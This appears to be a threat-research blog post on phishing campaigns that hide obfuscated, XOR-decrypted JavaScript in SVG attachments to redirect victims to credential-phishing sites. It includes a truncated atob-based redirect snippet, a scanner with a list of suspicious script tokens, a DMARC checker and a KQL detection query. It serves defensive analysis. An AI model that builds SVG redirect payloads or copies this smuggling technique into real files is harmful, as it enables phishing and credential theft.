SVG Smuggling – Image Embedded JavaScript Redirect Attacks

Introduction

Threat actors are increasingly leveraging Scalable Vector Graphics (SVG) files as a delivery vector for JavaScript-based redirect attacks. SVGs, commonly treated as harmless image formats, can contain embedded script elements. In these campaigns, adversaries embed obfuscated JavaScript within SVG files to initiate browser redirects at runtime.

The final redirect destinations are attacker-controlled infrastructure, with appended Base64-encoded strings used for victim tracking or correlation, while the payload is carefully structured for evasive purposes. The phishing themes vary between “ToDoList”, “Missed Call” and “Payment” related topics.

Technical Summary

  • SVG files are used to bypass traditional file-based detection.
  • Obfuscated JavaScript is embedded within <script><![CDATA[...]]></script> sections.
  • The final malicious URL is assembled using atob() and executed via window.location.href.
  • Email spoofing and impersonation are used to deliver the SVGs and increase the likelihood of user engagement.
  • The campaign has evolved by adding geofencing to the landing sites.

Technical Breakdown

SVG with Obfuscated JavaScript

The core of the payload is delivered via a .svg file that contains a JavaScript block hidden within a CDATA section. The embedded code uses a static XOR key to decrypt a secondary payload at runtime. This decoded script reconstructs and executes a redirect command using the Function() constructor. The destination URL is built using atob() and includes a Base64-encoded string, likely functioning as a tracking token or victim identifier.

Example payload snippet:

window.location.href = atob(
  'aHR0cHM6Ly93dnJ6LmxmdGt2b2cubmV0L...'
) + "$<Base64_Identifier>";

Delivery Mechanism

Initial access is gained through a phishing campaign using spoofed or impersonated email senders. Attackers deliver the malicious SVG either as a direct file attachment or via a link to an externally hosted image that appears harmless. The emails observed use domains with weak or misconfigured SPF, DKIM, and DMARC records, enabling successful impersonation of trusted brands or individuals.

All victims share the following problems:

  • No DKIM Records found
  • DMARC Quarantine and Reject policy not enabled

Additionally, some targets also miss DMARC Records entirely.
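As an added example (not from the original post), a small check that reproduces the two sender-domain gaps listed above: it parses a DMARC TXT record, tests whether the policy is quarantine or reject at pct=100 (including the subdomain policy), and looks for a DKIM key under a few common selectors. The DNS answers are constructed inline in place of live lookups, and the selector list is an assumption, since DKIM selectors cannot be enumerated from DNS.

```python
# Constructed DNS answers standing in for live lookups, so this runs offline. In practice the
# values come from TXT queries for _dmarc.<domain> and <selector>._domainkey.<domain>.
CONSTRUCTED_DNS = {
    "weak.example": {
        "_dmarc.weak.example": ["v=DMARC1; p=none; rua=mailto:reports@weak.example"],
    },
    "hardened.example": {
        "_dmarc.hardened.example": ["v=DMARC1; p=reject; sp=reject; pct=100; adkim=s; aspf=s"],
        "selector1._domainkey.hardened.example": ["v=DKIM1; k=rsa; p=<public-key-placeholder>"],
    },
}

ENFORCING = ("quarantine", "reject")


def parse_dmarc(record):
    """Parse 'tag=value; ...' into a dict; {} for anything that is not a DMARC1 record."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags if tags.get("v", "").upper() == "DMARC1" else {}


def assess_domain(domain, dns, selectors=("selector1", "selector2", "default")):
    """Report the sender-domain gaps the post lists: missing DKIM and non-enforcing DMARC."""
    answers = dns.get(domain, {})
    findings = []
    dmarc = [d for d in (parse_dmarc(r) for r in answers.get(f"_dmarc.{domain}", [])) if d]
    if not dmarc:
        findings.append("no DMARC record")
    else:
        policy = dmarc[0].get("p", "none").lower()
        pct = int(dmarc[0].get("pct", "100"))  # pct<100 leaves part of the mail unenforced
        if policy not in ENFORCING or pct < 100:
            findings.append(f"DMARC not enforcing (p={policy}, pct={pct})")
        if dmarc[0].get("sp", policy).lower() not in ENFORCING:  # sp defaults to p
            findings.append("subdomain policy not enforcing")
    # Assumption: DKIM selectors cannot be enumerated, so only a few common names are probed.
    if not any(answers.get(f"{s}._domainkey.{domain}") for s in selectors):
        findings.append("no DKIM record found for common selectors")
    return findings
```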

In several cases, the threat actor used lookalike domains that closely resemble legitimate entities. Email subject lines and body content are minimal and engineered to reduce suspicion, with a simple call to action or image display prompting the user to open or preview the file in a browser. Once rendered, the SVG silently executes the embedded JavaScript.

Figure 1: The Recipient’s perspective

Attacker Infrastructure

Several domains have been identified as part of the campaign infrastructure. Occasionally, the domains follow a randomized or subdomain-based structure that makes detection via static filtering more difficult. Domain reputation is low or unknown, and hosting behaviour suggests short-lived campaign infrastructure that may be rotated regularly.

Figure 2: Typical M365 Credential Phishing (edited, removed branding)

Bypass Implications

This technique demonstrates how adversaries are shifting away from executable payloads and towards smuggling techniques (first HTML, now SVG). By embedding script logic into image formats and using trusted browser functions, the attack chain avoids triggering traditional behavioural or signature-based alerts. JavaScript execution is achieved without requiring file drops or macros, and evasion is further enhanced by distributing the payload via spoofed emails that may pass basic anti-spam filters.

This campaign stands out for its use of browser-native redirection without requiring user interaction or external downloads. It bridges the gap between traditional phishing and full malware delivery, making it stealthy and effective.

Comparative Analysis with Other SVG Campaigns

This attack is part of a broader trend of adversaries using unconventional files as vehicles for malicious JavaScript.

Where earlier documented campaigns used plain embedded script tags or hosted their payloads on third-party services like Google Drive, this attack carries XOR-encrypted JavaScript inside the SVG itself, decrypted in the browser and executed via `Function()` and `atob()`. The final URL redirect includes a Base64 string used for victim tracking. Unlike campaigns that deliver executables or archives (e.g., ZIP or JAR files), this method avoids dropping any files, helping it bypass traditional EDR and AV tools.

Victimology

The observed targets of this campaign are B2B service providers: organisations that regularly handle valuable corporate data (including financial and employee data), utilities, and Software-as-a-Service providers. These make strong social engineering targets because they expect to receive a high volume of email.

Delivery is also more targeted. The attacker sends the malicious SVG as an attachment from spoofed or lookalike domains. The email typically lacks content, using a minimal format to avoid detection and provoke curiosity or interaction.

Mitigation Recommendations

  • Microsoft Defender for Office 365:
  • Email Hardening:
    • Implement enforcement-mode DMARC policies for your domains with SPF/DKIM alignment.
    • Block SVG attachments or use content disarm and reconstruction (CDR) on inbound email.
    • Monitor for abuse of lookalike domains impersonating your brand.
  • File Inspection:
    • Integrate deep content inspection into your email and endpoint solutions.
    • Flag SVG files containing script logic and encoding routines.
  • End-User Awareness:
    • Train users to treat unsolicited attachments, even images, with caution.
    • Include SVG-based phishing simulation in security awareness programs.
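The static triage that the File Inspection bullets describe, as an added example rather than the post's own tooling: it pulls every script body (CDATA included) and on* event attribute out of an SVG, flags the browser APIs named in the Technical Breakdown (atob, Function, window.location), and decodes Base64 literals so the redirect target and the appended tracking token become readable to the analyst. The sample SVG, its URL and its token are constructed placeholders.

```python
import base64
import re
import xml.etree.ElementTree as ET

# Constructed sample (not a real campaign file): a 1x1 SVG whose <script> CDATA block
# builds a redirect from a Base64 literal and appends a "$<token>" suffix. Placeholders only.
SAMPLE_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1">
<rect width="1" height="1"/>
<script><![CDATA[
window.location.href = atob('aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvbGFuZGluZw==') + "$dmljdGltLTAxMjM=";
]]></script>
</svg>"""

# Browser APIs the post ties to this technique; any hit in script content is the trigger.
SUSPICIOUS_TOKENS = ("atob(", "Function(", "eval(", "window.location", "fromCharCode", "charCodeAt")
B64_RUN = re.compile(r"[A-Za-z0-9+/]{12,}={0,2}")


def collect_script(svg_text):
    """Gather executable content: <script> bodies (CDATA included) and on* event attributes."""
    root = ET.fromstring(svg_text)
    pieces = []
    for el in root.iter():
        tag = el.tag.rsplit("}", 1)[-1]  # drop the XML namespace prefix
        if tag == "script" and el.text:
            pieces.append(el.text)
        for attr, val in el.attrib.items():
            if attr.lower().startswith("on"):  # onload=... also runs when the image renders
                pieces.append(val)
    return pieces


def decode_b64_literals(code):
    """Decode Base64-looking runs so the assembled redirect target and token are readable."""
    found = []
    for run in B64_RUN.findall(code):
        try:
            text = base64.b64decode(run, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if text.isprintable():
            found.append(text)
    return found


def scan_svg(svg_text):
    """Static triage of one SVG; the dict is what a mail or endpoint inspection hook would log."""
    pieces = collect_script(svg_text)
    code = "\n".join(pieces)
    tokens = sorted(t for t in SUSPICIOUS_TOKENS if t in code)
    return {"script_blocks": len(pieces), "tokens": tokens,
            "decoded": decode_b64_literals(code), "suspicious": bool(tokens)}
```

A real deployment would feed every inbound .svg attachment (and any SVG fetched by a browser from a mail link) through scan_svg and quarantine on suspicious=True, logging the decoded strings for the analyst.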

Detection

The Ontinue Threat Detection team shared the following broadly applicable KQL query to find instances of suspicious SVG files, correlating SVG email attachments with browser processes that later opened a file of the same name for the same recipient:

let lookback = 7d;
let SVGRegex = @"(?i).*\.svg(\..*)?$";
let Browsers = dynamic(["chrome.exe", "msedge.exe", "firefox.exe", "opera.exe", "brave.exe"]);
let SuspiciousSVGEmails = materialize(
    EmailAttachmentInfo
    | where TimeGenerated > ago(lookback)
    | where FileType == "xml" and FileName matches regex SVGRegex
    | join kind=inner (
        EmailEvents
        | where TimeGenerated > ago(lookback)
    ) on NetworkMessageId
    | extend RecipientEmailAddress = tolower(RecipientEmailAddress)
    | summarize by NetworkMessageId, Subject, FileName, RecipientEmailAddress
);
let SuspiciousSVGFileNames = materialize(
    SuspiciousSVGEmails
    | summarize by FileName
);
DeviceProcessEvents
| where TimeGenerated > ago(lookback)
| where ProcessCommandLine has_any (SuspiciousSVGFileNames)
| where FolderPath has_any (Browsers)
| extend AccountUpn = tolower(AccountUpn)
| extend SvgCLIFileName = extract(@"([^\\]+\.svg(?:\.\w+)*)", 1, ProcessCommandLine)
| join kind=inner SuspiciousSVGEmails
    on $left.AccountUpn == $right.RecipientEmailAddress and $left.SvgCLIFileName == $right.FileName

Indicators of Compromise

The indicators for this campaign are published in the ontinue-research/threat-intel-iocs repository, in the file Public/2025-07-10-IOCs-SVG-Smuggling-Image-Embedded-JavaScript-Redirect-Attacks.md (main branch).

Closing Thoughts

This campaign highlights a creative pivot in attacker methodology, using benign file formats to hide malicious logic and evade established detection controls. SVGs provide an effective delivery vehicle for client-side JavaScript, and spoofed emails reduce the friction required for successful execution. Security teams should prioritize the detection of dynamic script activity in non-traditional file types and review their controls for email-based file delivery.

Article By

Advanced Threat Operations Team
Ontinue - ATO

Ontinue’s Advanced Threat Operations (ATO) team leverages proactive threat identification, analysis, and mitigation to empower our customers with the resilience needed to tackle the constantly evolving threat landscape.

Balazs Greksza

Domenico de Vitto

Rhys Downing

Manupriya Sharma